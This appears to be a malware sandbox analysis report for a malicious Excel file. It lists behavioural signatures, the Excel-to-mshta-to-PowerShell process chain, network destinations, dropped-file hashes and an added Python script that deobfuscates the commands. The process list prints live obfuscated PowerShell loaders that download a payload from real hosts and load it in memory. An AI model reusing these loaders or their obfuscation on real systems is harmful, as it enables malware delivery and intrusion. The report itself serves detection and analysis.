Analysis Overview
SHA256
ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed
Threat Level: Known bad
The file ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls was found to be: Known bad.
Malicious Activity Summary
Process spawned unexpected child process
Blocklisted process makes network request
Evasion via Device Credential Deployment
Command and Scripting Interpreter: PowerShell
Drops file in System32 directory
Enumerates physical storage devices
System Location Discovery: System Language Discovery
Suspicious use of AdjustPrivilegeToken
Uses Task Scheduler COM API
Checks processor information in registry
Suspicious use of SetWindowsHookEx
Enumerates system info in registry
Suspicious behavior: AddClipboardFormatListener
Suspicious use of WriteProcessMemory
Uses Volume Shadow Copy service COM API
Modifies Internet Explorer settings
Suspicious behavior: EnumeratesProcesses
Uses Volume Shadow Copy WMI provider
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-13 03:03
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-13 03:03
Reported
2024-11-13 03:06
Platform
win7-20241023-en
Max time kernel
139s
Max time network
140s
Signatures
Blocklisted process makes network request
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\mshta.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Command and Scripting Interpreter: PowerShell
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Evasion via Device Credential Deployment
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Drops file in System32 directory
| Description | Indicator | Process | Target |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| File opened for modification | C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates physical storage devices
System Location Discovery: System Language Discovery
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\mshta.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WScript.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Modifies Internet Explorer settings
| Description | Indicator | Process | Target |
| Key created | \REGISTRY\USER\S-1-5-21-1163522206-1469769407-485553996-1000\Software\Microsoft\Internet Explorer\Main | C:\Windows\SysWOW64\mshta.exe | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious behavior: EnumeratesProcesses
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| N/A | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of AdjustPrivilegeToken
| Description | Indicator | Process | Target |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
| Token: SeDebugPrivilege | N/A | C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
Processes
C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\ee6666aa9e5387583b1acb4e3684dfcb10c67d2fa6738b7ba07864b79976f2ed.xls
C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
C:\Windows\SysWOW64\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE
"C:\Windows\SYSteM32\wiNdoWspoWERsHELl\V1.0\powerSHELl.eXE" "poWERSheLL.ExE -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT ; IeX($(IeX('[SYsTEM.TEXT.EncodiNG]'+[CHar]58+[CHAR]0x3a+'UTF8.GetStRing([sYSTEm.coNverT]'+[chaR]0x3A+[chaR]58+'froMbase64String('+[cHAR]0x22+'…'+[cHar]34+'))')))"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ex BYPASs -nOP -W 1 -c dEViCECRedeNTIaLdePLOymenT
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\clbffc8o.cmdline"
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESD682.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCD681.tmp"
C:\Windows\SysWOW64\WScript.exe
"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs"
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = '…';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "& ( $PshOMe[4]+$psHomE[30]+'x')( (('AM8imageUrl = y9cnhttps://1017.filem'+'ail.com/a'+'pi/f'+'ile/get?filekey=2Aa_bWo9Reu45t7BU1'+'kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_'+'T35w&pk_vid=fd4f614bb209c62c1730945176a0904f y9cn;AM8webClient = New-Object System.Net.WebClient;AM8imageBytes = AM'+'8webClient.DownloadData(AM8image'+'Url);AM8imageText = [System.Text.Encoding]::UTF8.GetString(AM'+'8imageByte'+'s);AM8startFlag = y9cn<<'+'BASE64_START>>y9cn;AM8endFlag'+' = y9cn<<BA'+'SE64'+'_END>>y9cn;AM8startIndex = A'+'M8imageText.'+'In'+'dexOf(AM8startFlag'+');A'+'M8endIndex = AM8imageText.IndexOf(AM8endFlag);AM8startIndex -ge 0 -and AM8endIndex -gt AM8startIn'+'d'+'ex;AM8startIndex += AM8startFlag.Le'+'ngt'+'h;AM8base64Length = AM8endIndex - AM8startIndex'+';AM8base64Command = AM8imageText.Sub'+'stri'+'ng(AM8startIndex, AM8base64Length);'+'AM8'+'base64Reversed = -join (AM8base64Command.'+'ToCharArray() PMW6 ForEach-Object { AM8_ })[-1..-(AM8base'+'64Command.Length)];'+'AM'+'8comman'+'dBytes = [S'+'ystem.Convert]::FromBase64String(AM8base64Reversed);AM8loadedAssembly = [System.Reflection.Assembly]::Load(AM8commandBytes);AM8vaiMethod = [dnlib.IO.Home].GetMethod(y9cnVAIy9cn);AM8vaiMethod.I'+'nvoke(AM8null, @(y9cntxt.ERFVGRFE/53/291.871.64.891//:ptthy9cn, y9cndesat'+'ivadoy9cn, y9cndesativadoy9cn'+', y9cndesativadoy9cn, y9cnCasPoly9c'+'n, y9cndesativadoy'+'9cn, y9cndesativadoy9cn,y9cndesativadoy9c'+'n,y9cndesativadoy9cn,y9cndesativadoy9cn,y9'+'cndesativadoy9cn,y9cndesat'+'ivadoy9cn,y9cn1y9cn,y9cndesativadoy9cn));') -cReplAce'PMW6',[ChAR]124 -cReplAce([ChAR]121+[ChAR]57+[ChAR]99+[ChAR]110),[ChAR]39-rePLAce([ChAR]65+[ChAR]77+[ChAR]56),[ChAR]36) )"
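The PowerShell command lines above are obfuscated in ways that can be undone mechanically. The script below is an added example written for this page, not code from the sandbox or from the sample: it evaluates the 'literal'+[CHAR]n concatenations of the first-stage command, resolves $PshOMe[4]+$psHomE[30]+'x' to the cmdlet name, applies the -cReplAce / -rePLAce token swaps to the second-stage script, and reverses the back-to-front URL that script passes to VAI. OBFUSCATED is a shortened excerpt of the last command line above; STAGE1_EXPR carries a placeholder base64 argument because the real one is elided on the page; SAMPLE_BLOB is a constructed stand-in for the filemail download; the $PSHOME value is assumed to be the standard install path.

```python
import base64
import re

# Added example, not sandbox or malware code: undo the PowerShell obfuscation recorded in the
# behavioral1 process list above. Two patterns occur there:
#   1. '[SYsTEM.TEXT.EncodiNG]'+[CHar]58+[CHAR]0x3a+'UTF8...'   strings built from [CHAR] codes
#   2. & ( $PshOMe[4]+$psHomE[30]+'x')( ('...'+'...') -cReplAce'PMW6',[ChAR]124 ... )
#      the cmdlet name spelled from $PSHOME characters, '|' "'" '$' swapped for the tokens
#      PMW6 / y9cn / AM8, and the stage-two URL stored back to front.

# $PSHOME of the 32-bit host the report shows. Assumed standard path; index 4 is 'i' and
# index 30 is 'e' for the System32 path too, since both directory names are 8 characters.
PSHOME = r"C:\Windows\SysWOW64\WindowsPowerShell\v1.0"

# Pieces of a concatenation expression in source order: a single-quoted literal, a
# [char]N / [char]0xN cast, or an index into $PSHOME. The joining '+' is implied.
_TOKEN = re.compile(
    r"'([^']*)'"                        # group 1: literal
    r"|\[char\]\s*(0x[0-9a-f]+|\d+)"    # group 2: char code, decimal or hex
    r"|\$pshome\[(\d+)\]",              # group 3: $PSHOME[n]
    re.IGNORECASE,
)
_REPLACE = re.compile(r"\s*-(c?)replace\s*", re.IGNORECASE)
_HEAD = re.compile(r"^\s*&\s*\((.*?)\)\s*\((.*)\)\s*$", re.DOTALL)
_REVERSED_URL = re.compile(r"'([^']*//:s?ptth)'")   # 'http://' or 'https://' written backwards


def eval_concat(expr: str, pshome: str = PSHOME) -> str:
    """Evaluate 'lit'+[CHAR]n+$PSHOME[i]+... to the string PowerShell would build."""
    out = []
    for lit, code, idx in _TOKEN.findall(expr):
        if code:
            out.append(chr(int(code, 0)))   # int(x, 0) accepts "58" and "0x3a" alike
        elif idx:
            out.append(pshome[int(idx)])
        else:
            out.append(lit)
    return "".join(out)


def eval_replace_chain(body: str) -> str:
    """Evaluate  (<concat expr>) -creplace OLD,NEW -replace OLD,NEW ...  left to right.
    -creplace is case-sensitive, -replace is not; both take OLD as a regular expression."""
    parts = _REPLACE.split(body)                  # [expr, flag, spec, flag, spec, ...]
    text = eval_concat(parts[0])
    for flag, spec in zip(parts[1::2], parts[2::2]):
        old_expr, new_expr = spec.split(",", 1)   # assumes no comma inside OLD
        old, new = eval_concat(old_expr), eval_concat(new_expr)
        flags = 0 if flag.lower() == "c" else re.IGNORECASE
        text = re.sub(old, lambda _m, new=new: new, text, flags=flags)
    return text


def decode_invocation(cmd: str) -> tuple[str, str]:
    """Split `& ( <cmdlet expr> )( <script expr> )` into (cmdlet, decoded script)."""
    m = _HEAD.match(cmd)
    if not m:
        raise ValueError("not an `& (expr)(expr)` invocation")
    return eval_concat(m.group(1)), eval_replace_chain(m.group(2))


def recover_reversed_urls(script: str) -> list[str]:
    """Quoted strings ending in 'ptth' are URLs stored back to front; reverse them."""
    return [s[::-1] for s in _REVERSED_URL.findall(script)]


def extract_stage2(blob: str, start: str = "<<BASE64_START>>", end: str = "<<BASE64_END>>") -> bytes:
    """Repeat what the decoded script does with the downloaded text: take the characters
    between the markers, reverse them, base64-decode. That is the assembly it hands to
    [System.Reflection.Assembly]::Load()."""
    i = blob.index(start) + len(start)
    j = blob.index(end, i)
    return base64.b64decode(blob[i:j][::-1])


# Shortened excerpt of the obfuscated command line above (same shape, fewer fragments).
OBFUSCATED = (
    r"& ( $PshOMe[4]+$psHomE[30]+'x')( (('AM8imageUrl = y9cnhttps://1017.filem'+'ail.com/a'+'pi/f'"
    r"+'ile/get?filekey=2Aa_bWo9Reu45t7BU1'+'kVgsd9pT9pgSSlvStGrnTICfFhmTKj3LC6SQtIcOc_'"
    r"+'T35w&pk_vid=fd4f614bb209c62c1730945176a0904f y9cn;AM8webClient = New-Object System.Net.WebClient;"
    r"AM8imageBytes = AM'+'8webClient.DownloadData(AM8image'+'Url);AM8base64Reversed = -join (AM8base64Command.'"
    r"+'ToCharArray() PMW6 ForEach-Object { AM8_ })[-1..-(AM8base'+'64Command.Length)];AM8vaiMethod.I'"
    r"+'nvoke(AM8null, @(y9cntxt.ERFVGRFE/53/291.871.64.891//:ptthy9cn, y9cndesat'+'ivadoy9cn));')"
    r" -cReplAce'PMW6',[ChAR]124 -cReplAce([ChAR]121+[ChAR]57+[ChAR]99+[ChAR]110),[ChAR]39"
    r"-rePLAce([ChAR]65+[ChAR]77+[ChAR]56),[ChAR]36) )"
)
# First-stage expression from the same run; its base64 argument is elided on the page, so
# the placeholder 'aGVsbG8=' stands in for it.
STAGE1_EXPR = (
    "'[SYsTEM.TEXT.EncodiNG]'+[CHar]58+[CHAR]0x3a+'UTF8.GetStRing([sYSTEm.coNverT]'"
    "+[chaR]0x3A+[chaR]58+'froMbase64String('+[cHAR]0x22+'aGVsbG8='+[cHar]34+'))'"
)
# Constructed stand-in for the filemail download: markers around a reversed base64 string.
SAMPLE_BLOB = "noise<<BASE64_START>>" + base64.b64encode(b"MZ\x90\x00stage2").decode()[::-1] + "<<BASE64_END>>noise"

if __name__ == "__main__":
    cmdlet, script = decode_invocation(OBFUSCATED)
    print(cmdlet, "->", script)
    print(recover_reversed_urls(script))
    print(eval_concat(STAGE1_EXPR))
    print(extract_stage2(SAMPLE_BLOB))
```

Running it yields iex as the cmdlet and http://198.46.178.192/35/EFRGVFRE.txt as the recovered URL, which is the plain-HTTP destination 198.46.178.192:80 in the Network table below. Two caveats when reusing this on other samples: -replace and -creplace treat OLD as a regex, so a token containing metacharacters must be escaped before the substitution; and the $PSHOME index trick only resolves correctly if you know the host's install path, which is why PSHOME is a parameter rather than a hard-coded fact.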
Network
| Country | Destination | Domain | Proto |
| US | 8.8.8.8:53 | 4t.gg | udp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 8.8.8.8:53 | r10.o.lencr.org | udp |
| GB | 2.23.210.82:80 | r10.o.lencr.org | tcp |
| US | 198.46.178.192:80 | 198.46.178.192 | tcp |
| KR | 221.146.204.133:443 | 4t.gg | tcp |
| US | 198.46.178.192:80 | 198.46.178.192 | tcp |
| US | 198.46.178.192:80 | 198.46.178.192 | tcp |
| US | 8.8.8.8:53 | 1017.filemail.com | udp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
| US | 142.215.209.78:443 | 1017.filemail.com | tcp |
Files
memory/2140-1-0x00000000720AD000-0x00000000720B8000-memory.dmp
memory/2140-0-0x000000005FFF0000-0x0000000060000000-memory.dmp
memory/2860-16-0x0000000001180000-0x0000000001182000-memory.dmp
memory/2140-17-0x0000000002310000-0x0000000002312000-memory.dmp
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CB467543952BE6B5200B9CADEB942CD1
| MD5 | fca2d4075e78fd8330d5590ee560451b |
| SHA1 | b7ab976b0f45facd4a29a6aded52515523cd756b |
| SHA256 | 9f9f330b74a23eac5552db138565085b9a57c32dc746c3ad230659ad37ddc689 |
| SHA512 | f0adf4b6d64229f3c8dee585a80a7e8e1614251318be226bbf5af21779bf7ffac0d9f9858525e5388f00b9547984dae737d022d0cce4ba4c66936383bf55f991 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CB467543952BE6B5200B9CADEB942CD1
| MD5 | babe37ac9f6d83aff9127cedd96b4e1e |
| SHA1 | 0bc44da57a054e8b6ca393ce1e254924a0d24e04 |
| SHA256 | ba3a09f7cb2a728311696fd5eaeefd373104ff23ba6aa676b9bc6766597a30dd |
| SHA512 | 6b809dac08601466670f78b01f667e6e9223aa2d388f23098bc37462adb28f62cfc1b30c9a3664f5433960b52e8318e955e5a76f073d6593bbbccdc5383d3da9 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751
| MD5 | 822467b728b7a66b081c91795373789a |
| SHA1 | d8f2f02e1eef62485a9feffd59ce837511749865 |
| SHA256 | af2343382b88335eea72251ad84949e244ff54b6995063e24459a7216e9576b9 |
| SHA512 | bacea07d92c32078ca6a0161549b4e18edab745dd44947e5f181d28cc24468e07769d6835816cdfb944fd3d0099bde5e21b48f4966824c5c16c1801712303eb6 |
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751
| MD5 | a87ce9c3e4bd82acb666debd5af25f43 |
| SHA1 | 85a43e29dd776014698c8203f789100a9c2f94db |
| SHA256 | 005c38f5c5e7df9efbbc89584de9a33a7e858695bc915e9ed5bcf3d75700fdf1 |
| SHA512 | f0f91c9bdfba2237e4777a5659187736f1a9b405045f9116874f6e38b366e2efc7ab48aabd12315c2cbb76a6dfa6e37266a25c85d50fc3b7a60dbd320a2e7d90 |
C:\Users\Admin\AppData\Local\Temp\CabCB6A.tmp
| MD5 | 49aebf8cbd62d92ac215b2923fb1b9f5 |
| SHA1 | 1723be06719828dda65ad804298d0431f6aff976 |
| SHA256 | b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f |
| SHA512 | bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b |
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\9GP4P3HF\seethebestthingswithgoodthingswithgreatthignsfor[1].hta
| MD5 | c9d3eb12917bbe42af6b4f091caf5796 |
| SHA1 | a88fc365c18e643a27984d6a7436c91c49a21717 |
| SHA256 | 7bd8a55560444bfe912702828550bcb7efcfb86a70a13c5d2c2e1035ae32e9d3 |
| SHA512 | fbcceaea137312e23f0480265b1e8e10c7f68f73346b08595a2e8b6b7d56f6fd764d1f6948da57f0e129019e71d0e2039924e4df0bc757fb7554ea1346aa96f5 |
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\CSM0DA6Y469005TMZVVM.temp
| MD5 | 68bd31e6547cdf0f6b6726cbea800f56 |
| SHA1 | 977363cd19dfc030c2c2ec540d0346922e46e841 |
| SHA256 | 0b58f5155c3ca16b7648d0fbfe4d654985a691b5fe943129fe00c4778d9de130 |
| SHA512 | 57d7a3ed58235ba2de6140f063687b39f3c94b913748b2ff8ebc5ad8108593c63cfe5bd23df959bb3c58031e3d0112da5d7d55a811847389a72381cb6570dad3 |
\??\c:\Users\Admin\AppData\Local\Temp\clbffc8o.cmdline
| MD5 | cee59847281c003ac966e2b8387a18b2 |
| SHA1 | 1f7333e7e311f4b5c719bbbad6b1734187d51a0c |
| SHA256 | 0836e6c4c1c6a23f3d77c513130d139af1c345d08cf1288623377f0ef6123407 |
| SHA512 | 92b9e0aa499f58ba092e980f2f528fa499e3f639598da3f7163344c4f119b8901558840c0762d643aeb648d33a74f954e0f9991af381d1b076a4c833300b5929 |
\??\c:\Users\Admin\AppData\Local\Temp\clbffc8o.0.cs
| MD5 | 39d4a6691d37c11ed58d537b74f12aad |
| SHA1 | caa119f2a0ad6f53ddb8a2447b379ac5ed11c1d6 |
| SHA256 | 0ad0cda12412bd6fa525c0e4f876fb02a55a98e7555e5a43423c577465611df1 |
| SHA512 | f4d2f58e0c3a15aec4dd83b4268e9a4c1f3b5ef3c735204457e2115b9835af874f4d34b7311a182e7b395888b523e9f46bb8b6ca08db60ad9eda04b89013813c |
C:\Users\Admin\AppData\Local\Temp\clbffc8o.pdb
| MD5 | 3040b1e499cca7b496da428300cb1788 |
| SHA1 | 8237f76c132ece236aee66ea7ae4a3b16e164334 |
| SHA256 | 38ea0d12e93c4cc8c91c6de3b903854c96993964d9b75a2096a785fa1e44d32a |
| SHA512 | b61590c8ad29447e6d4585088d05e09518a726d002fabe291fe1f5ae13e7223406358814dc700aa65a639e8f4353bf11a89107256008b28c8dc739135a16c9ee |
C:\Users\Admin\AppData\Local\Temp\clbffc8o.dll
| MD5 | e51a3a163b0ea2a5c3365e8cd5857226 |
| SHA1 | 1e4f27d69a9764558ef73f31f1f34edb2c6a18db |
| SHA256 | a4b61fe3bb65cb54586ba22870fcbe371bb1abd696d3d58ccc4e2545013ad959 |
| SHA512 | 8380363d1793ccc2cf2a7e52653b40526f03cd60914159c1f101155c0ba6b2e63364ca0931314b9699f845bff2d535d2f78ecb974ddcd38792b754aceec2242a |
C:\Users\Admin\AppData\Local\Temp\RESD682.tmp
| MD5 | a168413d00e1173092bf4047235bb7e5 |
| SHA1 | 18a413a31b668f736bbb906a8228b78824d00e6b |
| SHA256 | aa12d23a40d81a523de14ed101e7cfd2349b9ad3339d3d96d5d4ddbee1a187f1 |
| SHA512 | 1034d0c77bd55b14b3546696db06ee055e98fd770d1e9d69191c7c6e5e2733ff588c60988a1aa63e0f5026419d40cd355194b11d34487e4982f54ffa8bb613a9 |
\??\c:\Users\Admin\AppData\Local\Temp\CSCD681.tmp
| MD5 | bbc3f888ff3d1900f18f75ad99282ee2 |
| SHA1 | 7a21c55f7bfa9dba6fd0ac83fcebd487df3c8566 |
| SHA256 | 5a9ec907bc757f9dd645b36b5a1903b07db9aa7a69ec99805f63ce046651796d |
| SHA512 | 254451ef624033d835281e490e87b83dc2fbe1e580a6e8c2bed782d296e6c4eb20c1080cf07a1d6d2fdfce43b98299d7243ba89ec30c28430dda0c66db69c950 |
memory/2140-60-0x00000000720AD000-0x00000000720B8000-memory.dmp
C:\Users\Admin\AppData\Roaming\seethebestgirlseverdidbestthigns.vbs
| MD5 | 8e033f9bcfdc081ed84adcbf69b2cfed |
| SHA1 | 29919300cdba9322ec872189cea15ff7d573fc42 |
| SHA256 | 4d489671247459e4b2c1403511606a2463199f1a5044d7e1841e5387b8c86e0a |
| SHA512 | 58fca96df828c75274613291f1048228076ef0516d4bcdd4e51cba3d9c9c566b6ce5f03387bfd60cb627bbd8a799b37593fd3624574afd50f6df6f9777754ac0 |
\??\PIPE\srvsvc
| MD5 | d41d8cd98f00b204e9800998ecf8427e |
| SHA1 | da39a3ee5e6b4b0d3255bfef95601890afd80709 |
| SHA256 | e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855 |
| SHA512 | cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e |
Analysis: behavioral2
Detonation Overview
Submitted
2024-11-13 03:03
Reported
2024-11-13 03:06
Platform
win10v2004-20241007-en
Max time kernel
143s
Max time network
139s
Signatures
Process spawned unexpected child process
| Description | Indicator | Process | Target |
| Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process | N/A | C:\Windows\System32\mshta.exe | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE |
Checks processor information in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Enumerates system info in registry
| Description | Indicator | Process | Target |
| Key opened | \REGISTRY\MACHINE\Hardware\Description\System\BIOS | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious behavior: AddClipboardFormatListener
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of SetWindowsHookEx
| Description | Indicator | Process | Target |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
| N/A | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | N/A |
Suspicious use of WriteProcessMemory
| Description | Indicator | Process | Target |
| PID 4528 wrote to memory of 4236 | N/A | C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE | C:\Windows\System32\mshta.exe |
